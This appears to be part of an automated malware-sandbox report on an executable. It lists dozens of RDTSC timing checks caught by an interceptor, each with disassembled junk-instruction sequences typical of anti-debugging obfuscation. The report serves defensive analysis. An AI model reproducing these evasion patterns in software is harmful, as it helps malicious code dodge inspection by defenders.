                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F3A9 second address: 000000000039F3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F3B8 second address: 000000000039F3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7E95375D1Eh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F3D6 second address: 000000000039F3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E954D64AEh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F3EB second address: 000000000039F3EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F534 second address: 000000000039F53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F53A second address: 000000000039F548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7E95375CF6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F548 second address: 000000000039F54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003AC0CD second address: 00000000003AC0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003AC0D1 second address: 00000000003AC0F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B2642 second address: 00000000003B2646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B2646 second address: 00000000003B264C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B264C second address: 00000000003B265F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7E95375CF6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b ja 00007F7E95375CF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B265F second address: 00000000003B266B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B266B second address: 00000000003B267D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375CFDh 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B27FD second address: 00000000003B282E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E954D64B5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E954D64AFh 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B282E second address: 00000000003B2833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B2833 second address: 00000000003B283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B71DD second address: 00000000003B720F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F7E95375CF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7E95375D06h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F7E95375CF6h 0x0000001b jns 00007F7E95375CF6h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B720F second address: 00000000003B722A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B722A second address: 00000000003B7230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7230 second address: 00000000003B7249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64AEh 0x00000008 jbe 00007F7E954D64A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7249 second address: 00000000003B7266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D04h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7266 second address: 00000000003B726A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA564 second address: 00000000003BA576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA576 second address: 00000000003BA57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA57C second address: 00000000003BA580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA393 second address: 00000000003BA3B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F7E954D64A6h 0x00000013 jo 00007F7E954D64A6h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA3B4 second address: 00000000003BA3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F7E95375D04h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA3DF second address: 00000000003BA3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64ACh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C24CD second address: 00000000003C24D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EF2 second address: 00000000003C6EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EF6 second address: 00000000003C6EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EFA second address: 00000000003C6F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7E954D64ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6F17 second address: 00000000003C6F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7E95375CFFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D01h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CC884 second address: 00000000003CC894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7E954D64A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CC894 second address: 00000000003CC8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D01h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CB387 second address: 00000000003CB38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CB38B second address: 00000000003CB3A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7E95375CFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003D0329 second address: 00000000003D032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF2A second address: 00000000003CFF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF2E second address: 00000000003CFF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF32 second address: 00000000003CFF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7E95375CF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF49 second address: 00000000003CFF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE810 second address: 00000000003DE818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE818 second address: 00000000003DE81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE81D second address: 00000000003DE824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1721 second address: 00000000003F1725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1725 second address: 00000000003F1735 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1735 second address: 00000000003F1751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B7h 0x00000009 pop ebx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF05 second address: 000000000041AF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF0A second address: 000000000041AF32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64AEh 0x00000008 jg 00007F7E954D64A6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F7E954D64B2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF32 second address: 000000000041AF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A0E3 second address: 000000000041A0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7E954D64A6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A0ED second address: 000000000041A11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D01h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E95375D04h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A11D second address: 000000000041A121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A625 second address: 000000000041A63E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E95375D02h 0x00000008 jnc 00007F7E95375CF6h 0x0000000e jnl 00007F7E95375CF6h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A63E second address: 000000000041A671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7E954D64B5h 0x0000000f jmp 00007F7E954D64B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7BC second address: 000000000041A7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F7E95375D07h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7DE second address: 000000000041A7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ADh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7F6 second address: 000000000041A826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7E95375D05h 0x0000000b popad 0x0000000c js 00007F7E95375CFCh 0x00000012 jnp 00007F7E95375CF6h 0x00000018 jnp 00007F7E95375D15h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A826 second address: 000000000041A85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64B5h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A99F second address: 000000000041A9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7E95375CF6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A9A9 second address: 000000000041A9C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F7E954D64A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A9C9 second address: 000000000041A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041C54F second address: 000000000041C56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E954D64B4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041C56C second address: 000000000041C570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205A3 second address: 00000000004205BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E954D64B0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205BF second address: 00000000004205C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205C3 second address: 00000000004205CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000004205CD second address: 00000000004205D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000421E32 second address: 0000000000421E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7E954D64B2h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E40 second address: 0000000000423E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E47 second address: 0000000000423E54 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E954D64A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000423E54 second address: 0000000000423E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D60881 second address: 0000000004D608EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E954D64B6h 0x00000008 and ax, 0168h 0x0000000d jmp 00007F7E954D64ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F7E954D64B8h 0x0000001b or cl, FFFFFFC8h 0x0000001e jmp 00007F7E954D64ABh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F7E954D64B5h 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D608EE second address: 0000000004D6090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, D7h 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D6090D second address: 0000000004D60932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E954D64ADh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30E91 second address: 0000000004D30ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7E95375CFEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov di, 5DC4h 0x00000015 pushad 0x00000016 push edx 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 mov eax, edi 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ECF second address: 0000000004D30ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ED3 second address: 0000000004D30ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30ED7 second address: 0000000004D30EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30EDD second address: 0000000004D30EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07C0 second address: 0000000004DA07C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07C6 second address: 0000000004DA07E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E95375CFAh 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, edi 0x00000014 push edi 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07E2 second address: 0000000004DA07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64B3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA07F9 second address: 0000000004DA0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7E95375D05h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
